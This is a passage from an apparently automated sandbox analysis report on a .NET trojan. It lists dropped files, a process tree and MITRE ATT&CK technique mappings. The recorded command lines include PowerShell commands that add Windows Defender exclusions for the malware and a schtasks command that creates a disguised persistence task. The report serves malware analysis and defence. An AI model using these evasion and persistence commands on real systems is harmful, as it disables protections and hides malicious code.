"file_size": 340, "sha256": "a0a624e9239da9dc1db38d8504befd89404ae28c977e56d8faf24aa346c0cbe2", "type_tags": ["data"], "description": "data", "runtime_process": "powershell.exe (PID: 4784)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tmp2F3B.tmp", "file_path": "%TEMP%\\tmp2F3B.tmp", "file_size": 1591, "sha256": "ccf0272959c4d28aa1e3d915adf65cedd6e117e63e7b0a51aaa2d4761a926c18", "type_tags": ["text"], "description": "XML 1.0 document, ASCII text", "runtime_process": "PCGB2GtVYuBR0mw.pif.exe (PID: 2912)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "logs.dat", "file_size": 372, "sha256": "60b0cea4181a72017af9dc1273f63f19f8a53e85995485bc3f3b01bb9186dfaf", "type_tags": ["data"], "description": "data", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00002912", "name": "PCGB2GtVYuBR0mw.pif.exe", "normalized_path": "C:\\PCGB2GtVYuBR0mw.pif.exe", "sha256": "3aa746d45a8db14fb49d2fddd2141a8c41919fd262ef07140f2bb73e77e53147", "av_label": "Trojan.MSIL", "av_matched": 9, "av_total": 22}, {"uid": "00000000-00004784", "parentuid": "00000000-00002912", "name": "powershell.exe", "normalized_path": "%WINDIR%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "Add-MpPreference -ExclusionPath \"C:\\PCGB2GtVYuBR0mw.pif.exe\"", "sha256": "70ba57fb0bf2f34b86426d21559f5f6d05c1268193904de8e959d7b06ce964ce"}, {"uid": "00000000-00004640", "parentuid": "00000000-00002912", "name": "powershell.exe", "normalized_path": "%WINDIR%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "Add-MpPreference -ExclusionPath \"%APPDATA%\\SUbPwEbpBhA.exe\"", "sha256": "70ba57fb0bf2f34b86426d21559f5f6d05c1268193904de8e959d7b06ce964ce"}, {"uid": "00000000-00004424", "parentuid": "00000000-00002912", "name": "schtasks.exe", "normalized_path": "%WINDIR%\\System32\\schtasks.exe", "command_line": "/Create /TN \"Updates\\SUbPwEbpBhA\" /XML \"%TEMP%\\tmp2F3B.tmp\"", "sha256": "15018d0093befabba8b927743191030d1f8c17bb97fdb48c2fc3eab20e2d4b3d"}, {"uid": "00000000-00000508", "parentuid": "00000000-00002912", "name": "vbc.exe", "normalized_path": "%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe", "sha256": "466876f453563a272adb5d568670eca98d805e7ecaa5a2e18c92b6d3c947df93"}, {"uid": "00000000-00001584", "parentuid": "00000000-00002912", "name": "vbc.exe", "normalized_path": "%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe", "sha256": "466876f453563a272adb5d568670eca98d805e7ecaa5a2e18c92b6d3c947df93"}, {"uid": "00000000-00004880", "parentuid": "00000000-00002912", "name": "vbc.exe", "normalized_path": "%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe", "sha256": "466876f453563a272adb5d568670eca98d805e7ecaa5a2e18c92b6d3c947df93"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Drive-by Compromise", "attck_id": "T1189", "attck_id_wiki": "https://attack.mitre.org/techniques/T1189", "suspicious_identifiers_count": 1}, {"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Scheduled Task", "attck_id": "T1053.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053/005", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 3, "parent": {"technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Component Object Model", "attck_id": "T1559.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}}, {"tactic": "Execution", "technique": "PowerShell", "attck_id": "T1059.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053", "malicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Scheduled Task", "attck_id": "T1053.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053/005", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 3, "parent": {"technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 6, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053", "malicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Scheduled Task", "attck_id": "T1053.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053/005", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 3, "parent": {"technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 3, "informative_identifiers_count": 7}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Reflective Code Loading", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 6, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Masquerade Task or Service", "attck_id": "T1036.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Information Repositories", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-615", "type": 2, "relevance": 1, "name": "Can loads assembly that contains the code that is currently executing [Dotnet]", "description": "Found string \"GetExecutingAssembly\" (Indicator: \"GetExecutingAssembly\"; Source: \"00000000-00002912.00000001.224517.005B0000.00000004.mdmp, 00000000-00002912.00000001.224517.05A20000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\tmp2F3B.tmp\"\n \"powershell.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\xkt31g2x.oo5.ps1\"\n \"powershell.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\avk3cgll.dqe.psm1\"\n \"powershell.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\f5oo2dyu.gav.ps1\"\n \"powershell.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\b3declfa.cvf.psm1\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-605", "type": 2, "relevance": 1, "name": "May execute SQL queries", "description": "\"SELECT count_threads() from dual;\" (Source: PCGB2GtVYuBR0mw.pif, Indicator: \"select count_threads() from dual;\"), \"INSERT INTO `forum`(`ques_id`,`username`, `ts`, `post`) VALUES ('\" (Source: PCGB2GtVYuBR0mw.pif, Indicator: \"insert into `forum`(`ques_id`,`username`, `ts`, `post`) values ('\")\n \"SELECT * FROM user WHERE username='\" (Source: PCGB2GtVYuBR0mw.pif, Indicator: \"select * from user where username='\")\n \"SELECT name , gender, dob FROM actor WHERE name LIKE '%\" (Source: PCGB2GtVYuBR0mw.pif, Indicator: \"select name , gender, dob from actor where name like '%\")\n \"SELECT name, gender, dob FROM director WHERE name LIKE '%\" (Source: PCGB2GtVYuBR0mw.pif, Indicator: \"select name, gender, dob from director where name like '%\")\n \"SELECT movie_id FROM movie WHERE movie.title LIKE '%\" (Source: PCGB2GtVYuBR0mw.pif, Indicator: \"select movie_id from movie where movie.title like '%\")\n \"INSERT INTO `movie`(`title`, `year`, `language`, `genre`, `image`, `director_id`, `about`) VALUES ('\" (Source: PCGB2GtVYuBR0mw.pif, Indicator: \"insert into `movie`(`title`, `year`, `language`, `genre`, `image`, `director_id`, `about`) values ('\")\n \"INSERT INTO `actor`(`name`, `gender`, `dob`, `about`, `image`) VALUES ('\" (Source: PCGB2GtVYuBR0mw.pif, Indicator: \"insert into `actor`(`name`, `gender`, `dob`, `about`, `image`) values ('\")\n \"SELECT actor_id FROM actor WHERE name= '\" (Source: PCGB2GtVYuBR0mw.pif, Indicator: \"select actor_id from actor where name= '\")\n \"SELECT movie_id FROM movie WHERE title= '\" (Source: PCGB2GtVYuBR0mw.pif, Indicator: \"select movie_id from movie where title= '\")\n \"INSERT INTO `movie_actor`(`movie_id`, `actor_id`) VALUES (\" (Source: PCGB2GtVYuBR0mw.pif, Indicator: \"insert into `movie_actor`(`movie_id`, `actor_id`) values (\")\n \"SELECT title, avg(rating) as rating FROM movie natural LEFT OUTER JOIN review GROUP BY movie_id, title LIMIT 10\" (Source: PCGB2GtVYuBR0mw.pif, Indicator: \"select title, avg(rating) as rating from movie natural left outer join review group by movie_id\n title limit 10\"), \"SELECT username\n review_provided\n rating FROM review WHERE movie_id =\" (Source: PCGB2GtVYuBR0mw.pif, Indicator: \"select username\n review_provided\n rating from review where movie_id =\"), \"SELECT name FROM movie_actor natural join actor WHERE movie_id=\" (Source: PCGB2GtVYuBR0mw.pif, Indicator: \"select name from movie_actor natural join actor where movie_id=\"), \"INSERT INTO `favourites`(`movie_id`, `username`) VALUES (\" (Source: PCGB2GtVYuBR0mw.pif, Indicator: \"insert into `favourites`(`movie_id`, `username`) values (\")\n \"SELECT * FROM actor WHERE name LIKE '%\" (Source: PCGB2GtVYuBR0mw.pif, Indicator: \"select * from actor where name like '%\")\n \"SELECT gender, about, name, date(dob), director_id, image FROM director WHERE name LIKE '%\" (Source: PCGB2GtVYuBR0mw.pif, Indicator: \"select gender, about, name, date(dob)\n director_id\n image from director where name like '%\"), \"SELECT title FROM movie WHERE director_id =\" (Source: PCGB2GtVYuBR0mw.pif, Indicator: \"select title from movie where director_id =\"), \"SELECT ques_id, post, username, ts FROM forum group by ques_id LIMIT\" (Source: 6000001-ctor, Indicator: \"select ques_id, post, username, ts from forum group by ques_id limit\"), \"SELECT MAX(ques_id) from forum;\" (Source: 6000003-Forum~button1_Click, Indicator: \"select max(ques_id) from forum;\"), \"SELECT username, ts, post FROM forum WHERE ques_id =\" (Source: 6000007-ctor, Indicator: \"select username, ts, post from forum where ques_id =\"), 